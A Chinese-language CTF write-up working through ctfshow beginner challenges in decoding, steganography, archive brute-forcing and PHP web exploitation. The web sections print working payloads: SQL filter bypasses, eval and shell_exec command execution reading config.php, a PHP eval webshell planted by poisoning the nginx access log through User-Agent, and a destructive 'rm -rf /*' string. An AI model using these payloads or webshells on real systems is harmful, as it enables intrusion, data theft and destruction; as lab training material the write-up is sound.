【Loading 42/48】ctfshow_WriteUp | _萌新

萌新_密码1

题目

密文:
53316C6B5A6A42684D3256695A44566A4E47526A4D5459774C5556375A6D49324D32566C4D4449354F4749345A6A526B4F48303D

提交格式:KEY{XXXXXXXXXXXXXX}

分析

所有字符由数字和 ABCDEF 组成,先用 HEX 解码得到 S1lkZjBhM2ViZDVjNGRjMTYwLUV7ZmI2M2VlMDI5OGI4ZjRkOH0=


根据末尾的 “=” 猜测是 Base 系列编码,用 Base64 解码得到 KYdf0a3ebd5c4dc160-E{fb63ee0298b8f4d8}


字符串包含 flag 需要的完整大括号,猜测是栅栏密码,将字符串分两栏排列得到原始 flag。

Flag

KEY{dffb06a33eeeb0d259c84bd8cf146d08-}

参考

栅栏加密_解密 - Bugku CTF

萌新_密码2

题目

出题人已累,随便敲了几下键盘。。。 rdcvbg 2qase3 6tghu7

flag格式KEY{XXXXXX}

分析

按密文字符串的间隔初步猜测需要词频爆破,但字符串中包含数字,又觉得不太像。根据字符串在键盘上的分布规律,发现三条字符串在键盘上的位置分别围成三个圈。因为给出的字符串中字母均为小写,故将三个圈内的小写字符作为 flag 提交即可。

Flag

KEY{fwy}

萌新 密码3

题目

题目名称:我想吃培根 题目描述: -- --- .-. ... . ..--.- .. ... ..--.- -.-. --- --- .-.. ..--.- -... ..- - ..--.- -... .- -.-. --- -. ..--.- .. ... ..--.- -.-. --- --- .-.. . .-. ..--.- -- -- -.. -.. -- -.. -- -.. -- -- -- -.. -.. -.. /-- -.. -- -.. -.. --/ -- -- -- -- -- /-- -.. -.. -- -.. -- /-- -.. -.. -- 格式:flag{***********}

分析

根据题意,本题考查摩斯电码和培根密码。


先用摩斯电码对密文进行解密,其中分隔符为空格,“/” 处留一个空格后换行,得到解密结果 MORSE_IS_COOL_BUT_BACON_IS_COOLER_MMDDMDMDMMMDDDMDMDDMMMMMMMDDMDMMDDM


结果中 M 与 D 组成的部分显然为培根密码的输入,尝试将 M 与 D 分别替换为 A 和 B,最终通过 AABBABABAAABBBABABBAAAAAAABBABAABBA 得到 flag 内容。

Flag

flag{GUOWANG}

参考

摩斯电码转换_摩斯密码翻译器-在线工具
培根密码解密_培根密码转换器-ME2在线工具

萌新 隐写2

题目

文件的主人喜欢用生日做密码,而且还是个90后。

分析

根据题目,用 Ziperello 进行爆破,条件如下:


爆破出密码 19981000,先不管这串密码像不像生日,解开压缩包得到 flag。

Flag

flag{brute_force}

萌新 隐写4

题目

图片这么好看,但是没啥用呦

分析

用 010 Editor 打开文件,因为前面一般是文件头啥的不好藏信息所以从后往前翻,找到 flag:

Flag

flag{word_stega}

萌新 密码#4

题目

QW8obWdIWF5FKUFSQW5URihKXWZAJmx0OzYiLg==
比base64还大的base
推荐的网站打不开了就没放

分析

虽然但是这一串怎么看都像是 Base64 啊,先解码得到 Ao(mgHX^E)ARAnTF(J]f@<6".,再用 Base85、Base91、Base92 和 Base100 依次尝试,通过 Base85 解出半个 flag 样的字符串:


整不会了。WP 解法才知道这里的 &lt; 是 HTML 字符实体,实际表示的是小于符号,即实际的 Base64 解码结果为 Ao(mgHX^E)ARAnTF(J]f@<6".。将其通过 Base85 解码得到 flag。

Flag

flag{base_base_base}

参考

在线工具 - Bugku CTF
HTML 字符实体 < &gt_ &等-反面東东-博客园

萌新 隐写3

题目

Flag

flag{xinti_gkd}

杂项1

题目

小明想给心爱的妹子表白很久,可是不知道怎么开口,你能帮帮小明吗?

已知 md5(表白的话+ctf)=ed400fbcff269bd9c65292a97488168a

提交flag{表白的话}

md5解密网址:https://www.somd5.com/

解密得到helloctf

helloctf-ctf=hello

提交flag{hello}即可

分析

根据给出的解密网址对 md5 码进行解密:


……title 说得好啊!

Flag

flag{hello}

杂项2

题目

小明终于找到了萌新码,开始了自己的CTF冒险征程。

工具地址:https://www.lanzoui.com/i9h1lfi

提交flag{XXXXX}

分析

题目给的工具是 winhex,咱就直接用 010 Editor 开了。


在十六进制文件末尾找到 flag:

Flag

flag{ctfshow_im_coming}

萌新 杂项3

题目

大家好我是小萌新羽,前不久我的一个朋友给我了一张银行卡,他说里面有一大笔钱,但是他只告诉我他的生日是九七年十月一日,你能帮我猜猜他的银行卡密码是多少吗,哦对,这个朋友有个小名叫小五。

flag格式:flag{银行卡密码}

分析

银行卡密码一般是 6 位,从题目中能提取出的信息一个是生日 “19971001”,一个是 “小五”。九七年十月一日也可能被直接写为 “97101”,将其和 “5” 进行拼接可尝试出 flag。

Flag

flag{971015}

杂项4

题目

小明心爱的图片在压缩包中,可是小明夜深人静的时候,孤枕难眠,想打开图片排遣寂寞,可是忘记了密码了,小米依稀记得9位的密码都是数字,前3位是372,你能帮助小明吗?

工具地址:https://www.lanzoui.com/i9h29li
flag{372XXXXXX}

分析

题目给了个解 rar 压缩包的工具 Advanced Archive Password Recovery,根据题目要求,对压缩包进行爆破:


得到密码:


打开压缩包,里面有个 flag 格式的字符串不是 flag。

Flag

flag{372619038}

杂项5

题目

小明如愿以偿的打开了压缩包,可是眼前的文字自己只能认识FBI,其他的都不认识,而且屏幕出现了一句话,你能帮小明找到这句话的意思吗?

小明如愿以偿的打开了压缩包,可是眼前的文字自己只能认识FBI,其他的都不认识,而且屏幕出现了一句话,你能帮小明找到这句话的意思吗?

FBI No under 18

i was always Fond of visiting new scenes, and observing strange characters and manners. even when a mere chiLd i began my travels, and made mAny tours of discovery into foreiGn

分析

十八禁语段里有突兀的大小写字母,同时存在完整的一对大括号。猜测需要提取所有大写字母:


现在是藏头诗了。

Flag

FLAG{CTFSHOWNB}

杂项6

题目

小明的压缩包又忘记密码了?他去电脑维修店去修,人家扔出来说这个根本就没有密码,是个假密码。小明懵了,明明有密码的啊,你能帮帮小明吗?

分析

根据题目描述猜测是压缩包伪加密,根据之前的经验,将十六进制文件第 4 行的 09 更改为 00 后保存,打开压缩包得到 flag。

Flag

flag{c_t_f_s_h_o_w}

杂项7

题目

小明小心翼翼的打开压缩包,竟然是个图片,什么鬼?

要是图片能继续往长一点该多好啊,小明暗暗的想。

你能帮小明完成这个朴素的梦想吗?

分析

这题的提示可能透题就没开。压缩包里的图片擦边就不放了,把图片的高度拉高就能看到 flag。

Flag

flag{beautiful}

杂项8

题目

小明看完图片老脸一红,心想,我女朋友能有这么瘦就好了。

分析

010 Editor 打开出现报错提示,需要恢复图片。


使用大佬的代码对 crc 进行爆破,得到图片正确的长宽:


更改文件信息,


得到 flag。

Flag

flag{you_are_very_well}

杂项10

题目

小明决定不看小姐姐了,摘掉800度的眼镜,望向这个图片。

分析

用 800 度的双眼看到的图片应该是个黑白的轮廓,摘了眼镜看到五颗獠牙(?


看了大佬的 WP,是“我好喜欢你”。


是三百度不够有性价比吗

Flag

flag{我好喜欢你}

杂项11

题目

小明:怎么又说我???

工具地址:https://www.lanzoui.com/i9hm2di

分析

题目给了个破解图片隐写的工具 Jphswin,Open Jpeg 打开图片,Seek 查看隐写结果。因为题目没有给出多余信息所以直接提交空密码进行破解,保存后得到一个二维码图片:


打开扫出的链接显示 ctfshow 的网站。看链接后的一长串参数像是 Base64 编码,hackbar 解出一个带 flag 头的怪东西,改用 UTF-8 格式解码得到 flag。

Flag

flag{战神归来发现自己儿子在刷题,一怒之下召唤10万将士来报仇}

隐写1

题目

小明决定洗心革面学隐写了

分析

附件打不开,猜测是文件类型被更改了。打开十六进制文件发现文件类型没问题,但文件头的第一个字节是错误的。


将 99 改为 89 保存后得到 flag。

Flag

flag{zhe_ci_meiyou_ctfshow}

隐写2

题目

小明:???

工具:https://www.lanzoui.com/i9hm2di

分析

这题给的工具还是 Jphswin,用它打开题目给的图片提取隐写,提取出的文件用 txt 格式打开得到 flag。

Flag

flag{202cb962ac59075b964b07152d234b70}

【未完成】萌新隐写5

题目

分析

?这破路也能开

【未完成】萌新隐写6

题目

(给了一段音频

web1

题目

代码很安全,没有漏洞。

 <html>
<head>
    <title>ctf.show萌新计划web1</title>
    <meta charset="utf-8">
</head>
<body>
<?php
# 包含数据库连接文件
include("config.php");
# 判断get提交的参数id是否存在
if(isset($_GET['id'])){
    $id = $_GET['id'];
    # 判断id的值是否大于999
    if(intval($id) > 999){
        # id 大于 999 直接退出并返回错误
        die("id error");
    }else{
        # id 小于 999 拼接sql语句
        $sql = "select * from article where id = $id order by id limit 1 ";
        echo "执行的sql为:$sql<br>";
        # 执行sql 语句
        $result = $conn->query($sql);
        # 判断有没有查询结果
        if ($result->num_rows > 0) {
            # 如果有结果,获取结果对象的值$row
            while($row = $result->fetch_assoc()) {
                echo "id: " . $row["id"]. " - title: " . $row["title"]. " <br><hr>" . $row["content"]. "<br>";
            }
        }
        # 关闭数据库连接
        $conn->close();
    }
    
}else{
    highlight_file(__FILE__);
}

?>
</body>
<!-- flag in id = 1000 -->
</html> 

分析

根据注释提示,当 flag 位于 row[1000] 的位置,但直接向 id 大于 999 的数值或是任何转为十进制后大于 999 的值会被过滤。所以可以尝试往里面传一些字符串或者取反等方法绕过。


payload:?id=999%2B1,%2B 是加号的 url 编码结果。

Flag

ctfshow{f818106e-3459-4b78-8c18-971d2a8707f7}

web2

题目

管理员赶紧修补了漏洞,这下应该没问题了吧?

 <html>
<head>
    <title>ctf.show萌新计划web1</title>
    <meta charset="utf-8">
</head>
<body>
<?php
# 包含数据库连接文件
include("config.php");
# 判断get提交的参数id是否存在
if(isset($_GET['id'])){
        $id = $_GET['id'];
    if(preg_match("/or|\+/i",$id)){
            die("id error");
    }
    # 判断id的值是否大于999
    if(intval($id) > 999){
        # id 大于 999 直接退出并返回错误
        die("id error");
    }else{
        # id 小于 999 拼接sql语句
        $sql = "select * from article where id = $id order by id limit 1 ";
        echo "执行的sql为:$sql<br>";
        # 执行sql 语句
        $result = $conn->query($sql);
        # 判断有没有查询结果
        if ($result->num_rows > 0) {
            # 如果有结果,获取结果对象的值$row
            while($row = $result->fetch_assoc()) {
                echo "id: " . $row["id"]. " - title: " . $row["title"]. " <br><hr>" . $row["content"]. "<br>";
            }
        }
        # 关闭数据库连接
        $conn->close();
    }
    
}else{
    highlight_file(__FILE__);
}

?>
</body>
<!-- flag in id = 1000 -->
</html>

分析

web2 的代码在 web1 的基础上过滤了 “or” 和 “+”,因此我们选择对 1000 进行两次取反后传入。


payload:?id=~~1000

Flag

ctfshow{5084e9f8-de5f-4015-be3a-49811b1cabd8}

web3

题目

管理员被狠狠的教育了,所以决定好好修复一番。这次没问题了。

 <html>
<head>
    <title>ctf.show萌新计划web1</title>
    <meta charset="utf-8">
</head>
<body>
<?php
# 包含数据库连接文件
include("config.php");
# 判断get提交的参数id是否存在
if(isset($_GET['id'])){
        $id = $_GET['id'];
    if(preg_match("/or|\-|\\|\*|\<|\>|\!|x|hex|\+/i",$id)){
            die("id error");
    }
    # 判断id的值是否大于999
    if(intval($id) > 999){
        # id 大于 999 直接退出并返回错误
        die("id error");
    }else{
        # id 小于 999 拼接sql语句
        $sql = "select * from article where id = $id order by id limit 1 ";
        echo "执行的sql为:$sql<br>";
        # 执行sql 语句
        $result = $conn->query($sql);
        # 判断有没有查询结果
        if ($result->num_rows > 0) {
            # 如果有结果,获取结果对象的值$row
            while($row = $result->fetch_assoc()) {
                echo "id: " . $row["id"]. " - title: " . $row["title"]. " <br><hr>" . $row["content"]. "<br>";
            }
        }
        # 关闭数据库连接
        $conn->close();
    }
    
}else{
    highlight_file(__FILE__);
}

?>
</body>
<!-- flag in id = 1000 -->
</html>

分析

这次管理员将 “or” “-” “\” “*” “<” “>” “!” “x” “hex” “+” 都进行了过滤,所以 payload:?id=~~1000

Flag

ctfshow{78ee3935-7fd1-48d2-94d9-98f0f8b15247}

web4

题目

管理员阿呆又失败了,这次一定要堵住漏洞

 <html>
<head>
    <title>ctf.show萌新计划web1</title>
    <meta charset="utf-8">
</head>
<body>
<?php
# 包含数据库连接文件
include("config.php");
# 判断get提交的参数id是否存在
if(isset($_GET['id'])){
        $id = $_GET['id'];
    if(preg_match("/or|\-|\\\|\/|\\*|\<|\>|\!|x|hex|\(|\)|\+|select/i",$id)){
            die("id error");
    }
    # 判断id的值是否大于999
    if(intval($id) > 999){
        # id 大于 999 直接退出并返回错误
        die("id error");
    }else{
        # id 小于 999 拼接sql语句
        $sql = "select * from article where id = $id order by id limit 1 ";
        echo "执行的sql为:$sql<br>";
        # 执行sql 语句
        $result = $conn->query($sql);
        # 判断有没有查询结果
        if ($result->num_rows > 0) {
            # 如果有结果,获取结果对象的值$row
            while($row = $result->fetch_assoc()) {
                echo "id: " . $row["id"]. " - title: " . $row["title"]. " <br><hr>" . $row["content"]. "<br>";
            }
        }
        # 关闭数据库连接
        $conn->close();
    }
    
}else{
    highlight_file(__FILE__);
}

?>
</body>
<!-- flag in id = 1000 -->
</html>

分析

这次管理员将 “or” “-” “\” “*” “<” “>” “!” “x” “hex” “(” “)” “+” “select” 都进行了过滤,所以 payload:?id=~~1000

Flag

ctfshow{b301e31f-e8c1-4f7f-b3a6-73dfdd92c30f}

web5

题目

阿呆被老板狂骂一通,决定改掉自己大意的毛病,痛下杀手,修补漏洞。

 <html>
<head>
    <title>ctf.show萌新计划web1</title>
    <meta charset="utf-8">
</head>
<body>
<?php
# 包含数据库连接文件
include("config.php");
# 判断get提交的参数id是否存在
if(isset($_GET['id'])){
        $id = $_GET['id'];
    if(preg_match("/\'|\"|or|\||\-|\\\|\/|\\*|\<|\>|\!|x|hex|\(|\)|\+|select/i",$id)){
            die("id error");
    }
    # 判断id的值是否大于999
    if(intval($id) > 999){
        # id 大于 999 直接退出并返回错误
        die("id error");
    }else{
        # id 小于 999 拼接sql语句
        $sql = "select * from article where id = $id order by id limit 1 ";
        echo "执行的sql为:$sql<br>";
        # 执行sql 语句
        $result = $conn->query($sql);
        # 判断有没有查询结果
        if ($result->num_rows > 0) {
            # 如果有结果,获取结果对象的值$row
            while($row = $result->fetch_assoc()) {
                echo "id: " . $row["id"]. " - title: " . $row["title"]. " <br><hr>" . $row["content"]. "<br>";
            }
        }
        # 关闭数据库连接
        $conn->close();
    }
    
}else{
    highlight_file(__FILE__);
}

?>
</body>
<!-- flag in id = 1000 -->
</html>

分析

过滤了 “'” “"” “or” “|” “-” “\” “/” “*” “<” “>” “!” “x” “hex” “(” “)” “+” “select”,payload:?id=~~1000

Flag

ctfshow{b58a295a-6b17-4030-86f4-c78b8c8523dd}

web6

题目

阿呆一口老血差点噎死自己,决定杠上了

 <html>
<head>
    <title>ctf.show萌新计划web1</title>
    <meta charset="utf-8">
</head>
<body>
<?php
# 包含数据库连接文件
include("config.php");
# 判断get提交的参数id是否存在
if(isset($_GET['id'])){
        $id = $_GET['id'];
    if(preg_match("/\'|\"|or|\||\-|\\\|\/|\\*|\<|\>|\^|\!|x|hex|\(|\)|\+|select/i",$id)){
            die("id error");
    }
    # 判断id的值是否大于999
    if(intval($id) > 999){
        # id 大于 999 直接退出并返回错误
        die("id error");
    }else{
        # id 小于 999 拼接sql语句
        $sql = "select * from article where id = $id order by id limit 1 ";
        echo "执行的sql为:$sql<br>";
        # 执行sql 语句
        $result = $conn->query($sql);
        # 判断有没有查询结果
        if ($result->num_rows > 0) {
            # 如果有结果,获取结果对象的值$row
            while($row = $result->fetch_assoc()) {
                echo "id: " . $row["id"]. " - title: " . $row["title"]. " <br><hr>" . $row["content"]. "<br>";
            }
        }
        # 关闭数据库连接
        $conn->close();
    }
    
}else{
    highlight_file(__FILE__);
}

?>
</body>
<!-- flag in id = 1000 -->
</html>

分析

过滤了 “'” “"” “or” “|” “-” “\” “/” “*” “<” “>” “^” “!” “x” “hex” “(” “)” “+” “select”,payload:?id=~~1000


嗯……学到许多

Flag

ctfshow{0eb4a723-f54b-4567-bf6a-fb0d9b6bb446}

web7

题目

阿呆得到最高指示,如果还出问题,就卷铺盖滚蛋,阿呆心在流血。

 <html>
<head>
    <title>ctf.show萌新计划web1</title>
    <meta charset="utf-8">
</head>
<body>
<?php
# 包含数据库连接文件
include("config.php");
# 判断get提交的参数id是否存在
if(isset($_GET['id'])){
        $id = $_GET['id'];
    if(preg_match("/\'|\"|or|\||\-|\\\|\/|\\*|\<|\>|\^|\!|\~|x|hex|\(|\)|\+|select/i",$id)){
            die("id error");
    }
    # 判断id的值是否大于999
    if(intval($id) > 999){
        # id 大于 999 直接退出并返回错误
        die("id error");
    }else{
        # id 小于 999 拼接sql语句
        $sql = "select * from article where id = $id order by id limit 1 ";
        echo "执行的sql为:$sql<br>";
        # 执行sql 语句
        $result = $conn->query($sql);
        # 判断有没有查询结果
        if ($result->num_rows > 0) {
            # 如果有结果,获取结果对象的值$row
            while($row = $result->fetch_assoc()) {
                echo "id: " . $row["id"]. " - title: " . $row["title"]. " <br><hr>" . $row["content"]. "<br>";
            }
        }
        # 关闭数据库连接
        $conn->close();
    }
    
}else{
    highlight_file(__FILE__);
}

?>
</body>
<!-- flag in id = 1000 -->
</html>

分析

好的终于把 “~” 给过滤了,根据源码罗列的关键词,考虑使用进制转换绕过。十六进制数需要的字母 x 被过滤了,尝试使用二进制数 0b1111101000 绕过。


payload:?id=0b1111101000

Flag

ctfshow{a0000beb-dc91-420f-a34c-aee7c522ae02}

web8

题目

阿呆熟悉的一顿操作,去了埃塞尔比亚。

PS:阿呆第一季完,敬请期待第二季!

 <html>
<head>
    <title>ctf.show萌新计划web1</title>
    <meta charset="utf-8">
</head>
<body>
<?php
# 包含数据库连接文件,key flag 也在里面定义
include("config.php");
# 判断get提交的参数id是否存在
if(isset($_GET['flag'])){
        if(isset($_GET['flag'])){
                $f = $_GET['flag'];
                if($key===$f){
                        echo $flag;
                }
        }
}else{
    highlight_file(__FILE__);
}

?>
</body>
</html>

分析

源码把所有的过滤都撤掉了,当传入的 flag 和变量 key 的值完全相同时得到 flag。但题目并未给出 key 的具体数值。


WP 解法,按照大佬的说法,提示的部分暗示阿呆已经删库跑路了,即 payload:?flag=rm -rf /*

Flag

ctfshow{ce54fcf1-78a0-40f0-8505-efc241be6985}

web9

题目

阿呆在埃塞俄比亚终于找了一个网管的工作,闲暇时还能种点菜。

 <?php
# flag in config.php
include("config.php");
if(isset($_GET['c'])){
        $c = $_GET['c'];
        if(preg_match("/system|exec|highlight/i",$c)){
                eval($c);
        }else{
            die("cmd error");
        }
}else{
        highlight_file(__FILE__);
}
?>

分析

代码提到当传入 c 的参数中存在 “system” “exec” “highlight” 这三种命令时将直接作为 php 代码执行,同时提示 flag 位于 config.php 文件中。


payload:?c=system("cat config.php");


执行后在查看器中获得 flag。

Flag

ctfshow{0f2987c0-121b-4381-864f-cf6e1b85d814}

web10

题目

阿呆看见对面二黑急冲冲的跑过来,告诉阿呆出大事了,阿呆问什么事,二黑说:这几天天旱,你菜死了!

 <?php
# flag in config.php
include("config.php");
if(isset($_GET['c'])){
        $c = $_GET['c'];
        if(!preg_match("/system|exec|highlight/i",$c)){
                eval($c);
        }else{
            die("cmd error");
        }
}else{
        highlight_file(__FILE__);
}
?>

分析

这次的代码将 “system” “exec” “highlight” 三种命令给过滤了,因此需要选择其他的命令函数。


payload:?c=passthru("cat config.php");

Flag

ctfshow{4ae64e4f-e2b1-4648-82d7-750ebdc12724}

参考

PHP执行系统命令函数-hackersb123-CSDN

web11

题目

阿呆听完自己菜死了,自己呆了。决定修好漏洞,绝对不能让自己再菜死了。

 <?php
# flag in config.php
include("config.php");
if(isset($_GET['c'])){
        $c = $_GET['c'];
        if(!preg_match("/system|exec|highlight|cat/i",$c)){
                eval($c);
        }else{
            die("cmd error");
        }
}else{
        highlight_file(__FILE__);
}
?>

分析

这题代码在过滤的命令中加入了 “cat”,于是 payload:?c=passthru("tac config.php");

Flag

ctfshow{f5d3fdbd-a99b-4b3b-a5f8-e92ae9bf7f41}

web12

题目

阿呆不慌不忙的拔掉自己所有的菜,以后自己就不会菜死了。

 <?php
# flag in config.php
include("config.php");
if(isset($_GET['c'])){
        $c = $_GET['c'];
        if(!preg_match("/system|exec|highlight|cat|\.|php|config/i",$c)){
                eval($c);
        }else{
            die("cmd error");
        }
}else{
        highlight_file(__FILE__);
}
?>

分析

这题直接把 flag 的文件名给禁了,我们采用模糊查找。payload:?c=passthru("tac con*");

Flag

ctfshow{bd87ed77-475a-4ff5-aa1b-822904ec1258}

web13

题目

阿呆彻底呆了,阿呆拿起谷姐搜索好久,终于找到更狠的方法。

 <?php
# flag in config.php
include("config.php");
if(isset($_GET['c'])){
        $c = $_GET['c'];
        if(!preg_match("/system|exec|highlight|cat|\.|\;|file|php|config/i",$c)){
                eval($c);
        }else{
            die("cmd error");
        }
}else{
        highlight_file(__FILE__);
}
?>

分析

这题把 php 代码行末尾的分号也给禁了,看了大佬的 WP 才知道可以直接闭合 php 代码段运行,即 payload:?c=passthru("tac con*")?>

Flag

ctfshow{a524160c-8287-49e0-8334-2343ad2e1eda}

参考

ctfshow-萌新-web13( 利用代码执行漏洞获取网站敏感文件)-士别三日wyx-CSDN

web14

题目

阿呆忍无可忍了,告诉自己,如果还被攻,自己就跳下去

 <?php
# flag in config.php
include("config.php");
if(isset($_GET['c'])){
        $c = $_GET['c'];
        if(!preg_match("/system|exec|highlight|cat|\(|\.|\;|file|php|config/i",$c)){
                eval($c);
        }else{
            die("cmd error");
        }
}else{
        highlight_file(__FILE__);
}
?>

分析

这题的过滤在前一题的基础上加了一个 “(”,这里使用内敛执行绕过,payload:?c=echo `tac con*`?>

Flag

ctfshow{0d93543c-ba94-4e20-8402-2d0192f1edb3}

参考

PHP-RCE绕过的姿势总结-4v1d-CSDN

web15

题目

人为什么要活着?难道埃塞俄比亚再无我阿呆容身之处?

 <?php
# flag in config.php
include("config.php");
if(isset($_GET['c'])){
        $c = $_GET['c'];
        if(!preg_match("/system|\\*|\?|\<|\>|\=|exec|highlight|cat|\(|\.|file|php|config/i",$c)){
                eval($c);
        }else{
            die("cmd error");
        }
}else{
        highlight_file(__FILE__);
}
?>

分析

这题把 “;” 的过滤去掉了,但加上了 “?” “>”,非常不妙。看了看大佬的 WP,可以通过一句话木马用 POST 请求传入命令操作。

get 请求传入一句话木马 ?c=echo `$_POST[postc]`;,之后用 post 方式向 postc 传入 postc=cat config.php,在查看器中获得 flag。

Flag

ctfshow{2c96c6af-5c3a-424f-a4bc-fde162f13d62}

参考

CTFshow web15-士别三日wyx-CSDN

web16

题目

阿呆为了自己的梦想(fulage),决定来一波反向跑路。

 <?php
# flag in config.php
include("config.php");
if(isset($_GET['c'])){
        $c = $_GET['c'];
        if(md5("ctfshow$c")==="a6f57ae38a22448c2f07f3f95f49c84e"){
            echo $flag;
        }else{
            echo "nonono!";
        }
}else{
        highlight_file(__FILE__);
}
?>

分析

那代码里的 md5 破解了一下得到 ctfshow36d,即传入 c 的值应该为 36d。payload:?c=36d

Flag

ctfshow{c2d4e218-342f-41a4-8a23-d257df9acd56}

参考

md5解密网址

web17

题目

阿呆终于怀揣自己的梦想来到了故土,凭借着高超的系统垃圾清理(rm -rf /*)技术,很快的阿呆找到了一份程序员工作

 <?php
if(isset($_GET['c'])){
       $c=$_GET['c'];
       if(!preg_match("/php/i",$c)){
               include($c);

       }


}else{
        highlight_file(__FILE__);
}
?>

分析

根据 include($c) 猜测是文件包含漏洞。但题目把 php 过滤了,没法直接进行远程文件包含。


WP 解法,这题采用日志包含。说是在 nginx 目录下有个访问日志 access.log,位置在 /var/log/nginx/access.log。先 ?c=/var/log/nginx/access.log 看看文件内容:

172.12.0.5 - - [09/Feb/2024:07:00:02 +0000] "GET / HTTP/1.1" 200 1450 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0"
172.12.0.5 - - [09/Feb/2024:07:00:21 +0000] "GET / HTTP/1.1" 200 1450 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.123 Safari/537.36"
172.12.0.5 - - [09/Feb/2024:07:00:21 +0000] "GET /favicon.ico HTTP/1.1" 200 1450 "http://90e13765-792e-46ae-b92d-183428778268.challenge.ctf.show/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.123 Safari/537.36"
172.12.0.5 - - [09/Feb/2024:07:01:03 +0000] "GET /?c=/var/log/nginx/access.log HTTP/1.1" 200 630 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.123 Safari/537.36"
172.12.0.5 - - [09/Feb/2024:07:01:03 +0000] "GET /favicon.ico HTTP/1.1" 200 1450 "http://90e13765-792e-46ae-b92d-183428778268.challenge.ctf.show/?c=/var/log/nginx/access.log" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.123 Safari/537.36"

对比一下请求包:


access.log 文件包含了请求包中的 Host 和 User-Agent 字段。尝试往 Host 字段中传入一句话木马 <?php @eval($_POST['web17']);?>


放行后页面 400 了:

中国蚁剑连接失败。


看来还是得从 User-Agent 字段传入:


传入后通过中国蚁剑连接环境的 access.log 文件。此时文件中的 User-Agent 字段已经包含传入的一句话木马,运行文件后木马将作为 php 代码直接执行,因而可以顺利连接中国蚁剑。


连接后在 /var/www/html/36d.php 文件中找到 flag。

Flag

ctfshow{0993460d-5e36-47f2-9177-69f234dde6fb}

参考

Nginx access.log日志详解及统计分析-Buckletime-CSDN
15. CTFshow 萌新 web集合-LuckMeteor-博客园

web18

题目

阿呆加入了过滤,这下完美了。

 <?php
if(isset($_GET['c'])){
       $c=$_GET['c'];
       if(!preg_match("/php|file/i",$c)){
               include($c);
       }


}else{
        highlight_file(__FILE__);
}
?>

分析

和 web17 相比,这题在 php 字段的基础上增加了对 file 的过滤。这对 web17 中用到的方法不造成影响,所以咱故技重施,?c=/var/log/nginx/access.log 查看 access 文件的内容:

172.12.0.5 - - [12/Feb/2024:13:44:41 +0000] "GET / HTTP/1.1" 200 1448 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0" 

依旧是包含了 User-Agent 字段。我们向 User-Agent 传入一句话木马 <?php @eval($_POST['web18']);?>


之后连接中国蚁剑,在 /var/www/html/36d.php 文件中找到 flag。

Flag

ctfshow{30db81a6-5b49-4917-8c13-cf6b2091f98f}

web19

题目

用到了解码?果断禁用base,哼

 <?php
if(isset($_GET['c'])){
       $c=$_GET['c'];
       if(!preg_match("/php|file|base/i",$c)){
               include($c);
       }


}else{
        highlight_file(__FILE__);
}
?>

分析

和 web18 相比,这题增加了对 base 的过滤。这对 web18 中用到的方法不造成影响。


查看 access 文件 ?c=/var/log/nginx/access.log

172.12.0.5 - - [12/Feb/2024:14:06:46 +0000] "GET / HTTP/1.1" 200 1453 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0" 172.12.0.5 - - [12/Feb/2024:14:09:21 +0000] "GET / HTTP/1.1" 200 1453 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.123 Safari/537.36" 172.12.0.5 - - [12/Feb/2024:14:09:22 +0000] "GET /favicon.ico HTTP/1.1" 200 1453 "http://d7b118a0-f46f-4e09-af17-1a1193bf6d8a.challenge.ctf.show/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.123 Safari/537.36"

向 User-Agent 传入一句话木马 <?php @eval($_POST['web19']);?>。打开中国蚁剑连接服务器,在 36d.php 中找到 flag。

Flag

ctfshow{0fa3b998-b0e2-46ea-b727-31627a11cdee}

web20

题目

百密一疏,竟然还有个rot

 <?php
if(isset($_GET['c'])){
       $c=$_GET['c'];
       if(!preg_match("/php|file|base|rot/i",$c)){
               include($c);
       }


}else{
        highlight_file(__FILE__);
}
?>

分析

查看?c=/var/log/nginx/access.log


一句话木马 <?php @eval($_POST['web20']);?>


你懂的。

Flag

ctfshow{b3e06032-545e-4be8-9967-505589787100}

web21

题目

阿呆绝地反击

Flag

ctfshow{a8430350-a129-4585-8ea1-46cf70de709c}

【未完成】web22

题目

还能搞,阿呆表示将直播倒立放水

 <?php
if(isset($_GET['c'])){
       $c=$_GET['c'];
       if(!preg_match("/\:|\/|\\\/i",$c)){
               include($c.".php");
       }


}else{
        highlight_file(__FILE__);
}
?>

分析

这回阿呆直接把路径给禁了,包括 “:” “/” “\” 符号。

参考

regex - why 3 backslash equal 4 backslash in php?-Stack Overflow

获得百分之百的快乐

题目

阿呆开发了自己的博客系统,准备对欺负他的大佬口吐芬芳

 <?php
show_source(__FILE__);
error_reporting(0);
if(strlen($_GET[1])<4){
     echo shell_exec($_GET[1]);
}
else{
     echo "hack!!!";
}
?>
//by Firebasky

分析

 <?php
show_source(__FILE__);  // 当前文件高亮显示
error_reporting(0);  // 出错不报错
if(strlen($_GET[1])<4){  // 如果向1传入值的字符串长度小于4
     echo shell_exec($_GET[1]);  //通过shell执行1的值的命令并将完整的输出以字符串的方式返回
}
else{
     echo "hack!!!";  // 否则输出hack!!!
}
?>

也就是说咱可以向 1 传入长度小于 4 的字符串命令并得到执行结果。先传入 ls 看看当前路径下的文件列表:


根据前几题的经验,flag 大概率在 secretsecret_ctfshow_36dddddddddd.php 文件里。但由于传入字符串长度的限制,cat 命令没法使用了。看了 大佬的 WP 才知道可以创建新文件后匹配为命令执行。


创建一个新文件名为 nl
?1=>nl
此时传入的字符串为 >nl,长度为3,可被执行。同时文件 nl 在文件列表中排首位:


接着匹配列表中首个文件的文件名作为命令执行:
?1=*
